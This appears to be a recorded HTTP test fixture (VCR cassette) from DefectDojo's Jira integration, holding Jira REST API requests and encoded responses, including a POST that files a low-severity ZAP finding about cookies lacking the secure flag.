8DZbq7QtbjAXvMDkc1dkdTt4Cctvzbpjg1oicE0AJYsncyAfM5P620S8drCzhIILZ7Qgbc7HqZeK + OrEATVQqphgviBwpFmcyV7nA1CJ2xta3Kxl9vpGr8w3QcJjtiReKZDYX3DDrkBwmsnEe3q/LWgae + kE9XQJ/s4sAnc5KibYv1Z8nu+1MRwv1AZWec14nfI8Sn/NUfU0EsxkA3BinJkJLjCdOiaTHv35/F + fw1ApLRTFkWOVz9M6twLNPwwDVTazgxH/vSJSm3nOlYwG1O9yopbHzAyarNdWRb0Ryd+7V6HXqAX + 1aUQOmcSBCmP5axJNQ0XO+GfQKwhv3aV4wV68FNOhBi98yZF30WTBmdLgV+1hSWDICLw0K8yJ7ou + fvFEB49SBnFLk2dAfouQWGPqqmkh/TExIsDEXoJEz+vSovLupKzi5+KNhYZcN1X/lw1PSNKERvwc + hHpSFz8sKRkSRtqAvVJvvirlCxrMbDl8iVY1vsuEjrthBnO1WSB8qSsJEIEWETumhUVGtsu2+9Z8 + wA8+9tlodN+rseWs3/22roXqJHCuksCgQVhfTVHKeKLmbCD/AAAA//8iMiDBQ79QO0BUNIjAXgvh + Dc4SoLZiq6JcXTADdf0LSAgjxHCPAhvgHAUGy0BDzL8oPTEvswocRTjGgdGV0CoMwSPBqJZhDT/0 + pZOI6Yh8JM24wxh5PgJJsy6SbgAAAAD//8RcwQ6CMAz9FY56MOEXjHow8eBFL8YDCYSYCCMi3Ph3 + 2WjXjbVqCMYbXYG+92pYV4YOTxRabhvHYtvYeEDoddU/O/TmBV5k1z27wO7N7fHl1AsRHU1rKlqY + rfR9NRXpZ3m91KmAtEi7dUdpgDlA0PybwspA0Lfh22Wx3ISOxSa08UAG9kWVmEUpI7/1za49qGja + zzbKcPC/hbjTos7K9vZQpbcY9MdAvp03iJjCyXiqUG5QTo6wdHWvIEJp4/9FB9lAZNtk4+XLfCxS + swEAY3I8ILRlgecSg6BECiuj35ZFFJAjwBVIXF2kCu9HRTZw2NgBmUKQBjjlYx4wGkcAfPWqSnIv + FXgRkWjVM6M8oAUEzmDK8KdnYAjFoUcQFvUwQJj1R7Z3Re+byAbcB5VH+svgt9CnKs9BHs8VhMiS + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 15df051a90ce5389 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:43 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 14042b32-ade0-47e6-8bf7-e001e220b970 + x-envoy-upstream-service-time: + - '74' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10607 + response: + body: + string: !!binary | + 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 + BSqkHAAA + headers: + ATL-TraceId: + - 4c6975e147e43d38 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:43 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - aecc980f-5c2a-46bc-b08b-1fb6800b9e12 + x-envoy-upstream-service-time: + - '179' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJmrbb3EQPKrIK2z2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7clQFo7wflaUWA8nINy5+dDbCDIBRoJDvd7ev+4eX9rrdrVMX + JyLfEpRBBu8ZGXA27jihDe1xxnjgzrh1iKFuHc3wGyEyBUpxMe9VSCAHznLgOa9axiSvZSEoANxA + hGPe4xJ723G6skUOrOUghZCipkXB/th+erTaRVBUZVlrpjWi2DaNViJpVKzmVbnlUfCyb6rmX0Ew + qeFpXBRJ72i1mvDsepXsEzGXiaD9OOzJ+fwDAAD//wMAwKBIfloBAAA= + headers: + ATL-TraceId: + - 9aa92c9a435493aa + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:47 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 4e686dce-5f92-4ac1-9c24-499183a300ac + x-envoy-upstream-service-time: + - '32' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - de7a7cd0e3194852 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:47 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 87c1f1a2-3c5e-41a1-9cbb-d60f9f6e6742 + x-envoy-upstream-service-time: + - '76' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - b5dff83910b72c86 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:47 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - bf7f52a4-eb57-4307-a945-4a926b712958 + x-envoy-upstream-service-time: + - '105' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Jira Api Test 4", + "description": "\n\n\n\n\n\n*Title*: [Jira Api Test 4|http://localhost:8080/finding/384]\n\n*Defect + Dojo link:* http://localhost:8080/finding/384\n\n*Severity:* Low \n\n*CWE:* + [CWE-614|https://cwe.mitre.org/data/definitions/614.html]\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [1st Quarter Engagement|http://localhost:8080/engagement/1] + / [ZAP Scan|http://localhost:8080/test/110]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n*Mitigation*:\nWhenever a cookie contains sensitive + information or is a session token, then it should always be passed using an + encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n*Defect + Dojo ID:* 384\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1690' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10608","key":"NTEST-456","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10608"}' + headers: + ATL-TraceId: + - d39dd769d8569658 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:48 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 6e70af9f-4674-482a-8a88-51143d00bc2d + x-envoy-upstream-service-time: + - '402' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-456 + response: + body: + string: !!binary | + H4sIAAAAAAAAA6RWbW/bNhD+K4Q+FFtm681e4goohjTx2mxpmtlOCywpDFo6S2wkUiApy17b/74j + JcWpM2dt6nyIeOS9PffckZ8cWJeUJ07kSOAJSEh+Z5AnqsdpAaqn4gwK2hMlSKqZ4KoHCdMFaNqL + M8pTyEXaW4FUuAfJBEoJCrhuzjo9hxnLgX/oj3ChIF/iMtO6VJHnJbCEWCfio3CpzqlSjHKXg/bQ + hvZoybzQY0pV4HUGbmGD+hez8XTWH/56iJKlDdaJPjkKnVYqphpSITdNcAmuUCH0w6DvD/p+MAv9 + aDiMhiM3ODr6xQ9838RofOhNCdbME2M0+hin74fbrJtFAiqWrDSIoPSYqILmeY8kTGnGY01KBjEQ + sSS1kLeu0Y4Fv5L5t0ShIK4keCsGNV1RTeVviv0DLwosUlU8a0RnyYvAHwSjdjnDQF9sU+45ptDo + a0bVralRtdDmK1rSXEHP6Ww4kTXypedohsQoschOxCvMxCml+IjhPRG9VttiZ6vRYWcW9wq+jfSK + M63RgOFXq22S+tOeVWKpaypNYooVZc6QIclONgiupcxwtB6OviXcFubWWYt0yQyw+LuP89A/Qs/h + cB0On2zYltCy5Jlq/z/iKzhcB4c/5mvdOWs/HvE2CNeD8Me8teRU3cdeb1++mP5ev2umC1bs+gNW + 